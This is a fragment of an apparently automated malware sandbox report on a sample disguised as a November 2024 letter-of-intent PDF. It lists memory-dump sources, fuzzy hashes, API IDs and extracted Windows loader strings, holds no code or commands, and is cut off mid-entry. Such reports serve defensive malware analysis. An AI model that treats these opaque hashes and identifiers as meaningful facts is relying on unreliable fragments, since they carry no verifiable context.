                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: RtlValidateHeap
                                                                                      • API String ID: 3446177414-1797218451
                                                                                      • Opcode ID: 32149b73577803d9c6c49565666f573797e525136b15858ecd4d507e7ef741e2
                                                                                      • Instruction ID: cc7b837047e418158bd570efab47ea916e450523ec5f0027b0c6ccb5a35b84ab
                                                                                      • Opcode Fuzzy Hash: 32149b73577803d9c6c49565666f573797e525136b15858ecd4d507e7ef741e2
                                                                                      • Instruction Fuzzy Hash: 2341157AB00355DFDB02EF64C4907AEFBB2BF81754F048A98DA526B380CB349901DB90
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: kLsE
                                                                                      • API String ID: 3446177414-3058123920
                                                                                      • Opcode ID: 0b1123bf7eebd2681882b04a4d8a32f23ce3bf1aa5b86426b7e6783b92aa09d5
                                                                                      • Instruction ID: 44b6a9215648a8df5134d25d9e639825782ec78290a62a45f99fa3c2cb2813bb
                                                                                      • Opcode Fuzzy Hash: 0b1123bf7eebd2681882b04a4d8a32f23ce3bf1aa5b86426b7e6783b92aa09d5
                                                                                      • Instruction Fuzzy Hash: A841297290234D87F711AF68C984BAD3BD4AB42B74F1506D9FE90AE1C2CBB44487CB91
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$@
                                                                                      • API String ID: 0-149943524
                                                                                      • Opcode ID: ef381f3aa33bcd53abdfc42b620fd0ecec6cf4794e6d787ac44121b50d3f4465
                                                                                      • Instruction ID: 61caa4a2ebba87f6392a97957f02617449fae8831fb7a16a898291ebb3dacc48
                                                                                      • Opcode Fuzzy Hash: ef381f3aa33bcd53abdfc42b620fd0ecec6cf4794e6d787ac44121b50d3f4465
                                                                                      • Instruction Fuzzy Hash: C8328DB9A083519BD7248F15C4A0B3EB7F1AF88748F504D1EFA959B2A0EB75C844CF52
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: 77d242d62569664775a8af8994449990b012d48042185d0b219504c8b69403d4
                                                                                      • Instruction ID: c20ba85538a2c54106ccee885a268cbbcac0f9a2531ccf92029bd0159e0e2e7b
                                                                                      • Opcode Fuzzy Hash: 77d242d62569664775a8af8994449990b012d48042185d0b219504c8b69403d4
                                                                                      • Instruction Fuzzy Hash: 5631BD35701B0AFBEB559F64CA90BD9FBA5FF44744F000825EA0157A60EBB1E920CBD1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$AddD
                                                                                      • API String ID: 0-2525844869
                                                                                      • Opcode ID: 9a6292f3ab656c3e524bbb2479fcc563a12035c744050e538f27f97e82a8fc61
                                                                                      • Instruction ID: 73ec669eb2703599e890e8e917fce51c2577be1cb543341aca9da959b0073b74
                                                                                      • Opcode Fuzzy Hash: 9a6292f3ab656c3e524bbb2479fcc563a12035c744050e538f27f97e82a8fc61
                                                                                      • Instruction Fuzzy Hash: 71A18EB5A04300AFE318CF54C885BABB7EDFB84704F544A6EF59587150E7B0E915CBA2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: $$$
                                                                                      • API String ID: 3446177414-233714265
                                                                                      • Opcode ID: 330e99c4ac00987747a313c0a2bc7def792e68eca10535b2e9e8ba6a0b59f945
                                                                                      • Instruction ID: 4752e14dd7001b4686a8ec12d585c0b03a01b017c63da466c3216ed53392515a
                                                                                      • Opcode Fuzzy Hash: 330e99c4ac00987747a313c0a2bc7def792e68eca10535b2e9e8ba6a0b59f945
                                                                                      • Instruction Fuzzy Hash: 6A61AB75A00749DFEB20CFA4C5A0B9DB7B1BF44708F104A69D6156F640DBB6A941CF90
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                      • API String ID: 0-118005554
                                                                                      • Opcode ID: eb806665687dcd446ce322fada0727ea081e3fe0848b1f881baab335422fc931
                                                                                      • Instruction ID: 315deae121ac9fc60b55cb44a985dfd5837df1f80a993014a97b881824d07c39
                                                                                      • Opcode Fuzzy Hash: eb806665687dcd446ce322fada0727ea081e3fe0848b1f881baab335422fc931
                                                                                      • Instruction Fuzzy Hash: 6D31EB752087459FD301CB68D958B2ABBE8EF84754F0848E9F990CB390EB70D805CB92
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .Local\$@
                                                                                      • API String ID: 0-380025441
                                                                                      • Opcode ID: 77d2f1ba054298947ec3736c477a0c9a6b2708246a74a698782ba3446d43b872
                                                                                      • Instruction ID: d2e50c9684ead18ef9c6defad292b97ede7ea97704e666b8f13c966848d90911
                                                                                      • Opcode Fuzzy Hash: 77d2f1ba054298947ec3736c477a0c9a6b2708246a74a698782ba3446d43b872
                                                                                      • Instruction Fuzzy Hash: 513190B6508315AFD310CF28C880A5BBBE8FBC5794F440D2EFA9487250DA31DD08CB92
                                                                                      Strings
                                                                                      • RtlpInitializeAssemblyStorageMap, xrefs: 33002A90
                                                                                      • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 33002A95
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                      • API String ID: 0-2653619699
                                                                                      • Opcode ID: 90c3b4be8f7f941498114420addd020ea9c400b30a741b742efe3a4bf5465ded
                                                                                      • Instruction ID: 5ec88b9d5a695262cfebb52bdc3c50c351333a07cd3ea1395d6994687caa61a2
                                                                                      • Opcode Fuzzy Hash: 90c3b4be8f7f941498114420addd020ea9c400b30a741b742efe3a4bf5465ded
                                                                                      • Instruction Fuzzy Hash: 6311EC76B00315ABF7198A48CE81F5B77ED9B95B94F1484697B04EB244DEB4CD008BA0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: 62ce582136fb3f9bb3c83c45416b54f0a62d753d2c762b483eb98ca70c99735a
                                                                                      • Instruction ID: 06608c3c931d634546cc7a9be51a277b601ba456f6b761a4ec1f93634094296a
                                                                                      • Opcode Fuzzy Hash: 62ce582136fb3f9bb3c83c45416b54f0a62d753d2c762b483eb98ca70c99735a
                                                                                      • Instruction Fuzzy Hash: 53B110B56083808FE355CF28C580A5ABBE1BF88744F544E6EE99ACB352D770E845CF42
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8ec745e36d7b23caeffba0bf070ea1d239cb3d542a73672825c8835900a637f0
                                                                                      • Instruction ID: 91d32103a22bd24039bb762f8d3de757ed50bc096338f640c9366196b7793261
                                                                                      • Opcode Fuzzy Hash: 8ec745e36d7b23caeffba0bf070ea1d239cb3d542a73672825c8835900a637f0
                                                                                      • Instruction Fuzzy Hash: E4A169B5A08341DFE314CF28C580A5ABBE5BF88744F104D6EEA859B351EB70E945CF92
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .
                                                                                      • API String ID: 0-248832578
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @
                                                                                      • API String ID: 0-2766056989
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /ntO
                                                                                      • API String ID: 0-913073837
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @
                                                                                      • API String ID: 0-2766056989
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PreferredUILanguages
                                                                                      • API String ID: 0-1884656846
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: verifier.dll
                                                                                      • API String ID: 0-3265496382
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: #
                                                                                      • API String ID: 0-1885708031
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Actx
                                                                                      • API String ID: 0-89312691
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrCreateEnclave
                                                                                      • API String ID: 0-3262589265
                                                                                      • Instruction Fuzzy Hash: DF61BCB5608742CBF701CF64C994B6AB7E4BF90704F1848ACF8D58B691EB75E806CB81
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e5824e76c76bdc07e97dd2f288207f70570a2a81a8a346579a7de1ee7ce71bad
                                                                                      • Instruction ID: 0737d8669de6e3b67efaf9b25e86de26c431a654efbabec283941663e2559503
                                                                                      • Opcode Fuzzy Hash: e5824e76c76bdc07e97dd2f288207f70570a2a81a8a346579a7de1ee7ce71bad
                                                                                      • Instruction Fuzzy Hash: 9C6167B5E0172A9FEB05CF68C540BADBBF1FF48724F04856AE959AB251C774A900CF90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8449899d70f11b915d7e53a4bf95409c51a298d45c5e1fe11413a26acb6ef3cc
                                                                                      • Instruction ID: a826e78d1fd1280b9f1183953bd70182de475ada4e48c8120dfaf50c43a94a8b
                                                                                      • Opcode Fuzzy Hash: 8449899d70f11b915d7e53a4bf95409c51a298d45c5e1fe11413a26acb6ef3cc
                                                                                      • Instruction Fuzzy Hash: 04413371600700DFE7169F29CD91B1AB7A9EF44764F114C2AEB69DB350DB70E841CB90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                                                                      • Instruction ID: 7584cd59f9409ee35c74e382319135229b187b1b0cfa1cb200658fda4f73fa32
                                                                                      • Opcode Fuzzy Hash: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                                                                      • Instruction Fuzzy Hash: 7851D6BA6003129BEB00AF649C40A6F77E5EF84780F440869FA58C7250FB75C856DFB2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9fb330093625ff51e6387d915807d50d7a57e5f20ba583768f950ab39667d23f
                                                                                      • Instruction ID: c6fa8cda80181cb8aefdbe9f0d97cf48d616a15f546fc3c01e80f1c77597b57a
                                                                                      • Opcode Fuzzy Hash: 9fb330093625ff51e6387d915807d50d7a57e5f20ba583768f950ab39667d23f
                                                                                      • Instruction Fuzzy Hash: 5151EFB15003409FF720EF69C880F5A77E8EF85B64F140A2DFA519B291DB74D841CBA6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 18429f8e42bd28199a82acb85bbb404d7ccf2cc51b85b4703a20eefdcdc48c83
                                                                                      • Instruction ID: 02c0b96eb03669367c755ef52c8aec19cf94f5dcfb5120a5a9b776a194c3c031
                                                                                      • Opcode Fuzzy Hash: 18429f8e42bd28199a82acb85bbb404d7ccf2cc51b85b4703a20eefdcdc48c83
                                                                                      • Instruction Fuzzy Hash: A7516E71A00348AFEB218FB5CC81BDDBBB5FF05344F60492AEA94A7191DBB29844DF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ef8e8214e1d9eeff2733bb0c5cd325350ff655c983a9c31f7d7e3a674df12fdc
                                                                                      • Instruction ID: d2ecf2b0722d139ede7d3bdd80e8877840f3e2c7c04dc2aefc2bd61a2ac34372
                                                                                      • Opcode Fuzzy Hash: ef8e8214e1d9eeff2733bb0c5cd325350ff655c983a9c31f7d7e3a674df12fdc
                                                                                      • Instruction Fuzzy Hash: CA51DF7AA04656AFD311CF68C8A0B69B7B0FF04710B018AA9ED44DB740EB35E991CBD0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                                                      • Instruction ID: 3be4d33fc4589f0849f39322b3581b591f94e06460335f432beff0ae2267d34d
                                                                                      • Opcode Fuzzy Hash: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                                                      • Instruction Fuzzy Hash: 88515C766083429FE700CF68C884B5ABBE6FFC8344F04896EF9A49B240D774E945CB52
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3fc41b4a57b3ae211b429f0ce6200384c45e654781a1b4c516da98ad60127a41
                                                                                      • Instruction ID: 7cc8d6543ffb5684587b69ae95e1976873845b9871f919a7c38bfb739502e4ea
                                                                                      • Opcode Fuzzy Hash: 3fc41b4a57b3ae211b429f0ce6200384c45e654781a1b4c516da98ad60127a41
                                                                                      • Instruction Fuzzy Hash: 4151BC76604301DFE711CF28C880B5ABBE5FF88354F0589AAF994DB250D774E949CB92
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bbf5e697dc9e4c6f83302953d9275bee8e8cee3bdc4fd9cd364f4f469197a136
                                                                                      • Instruction ID: 73d1c06847aafdfd77396994f84e1f8a2ec6dfdbaceb9e348f8d0e14e9eac963
                                                                                      • Opcode Fuzzy Hash: bbf5e697dc9e4c6f83302953d9275bee8e8cee3bdc4fd9cd364f4f469197a136
                                                                                      • Instruction Fuzzy Hash: A5517B76B01319DFFB11CBA8C840BEEB7B5AF08758F100869DA45FB250DBB5A841CB61
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9d2034ad89b0a0fbdf7ee0086258f14be42ed2e899d470c887d8813522647b1c
                                                                                      • Instruction ID: 613dbab128f93690e32ef13db84a3879a811715e05c114e5da9a453c3a5b765d
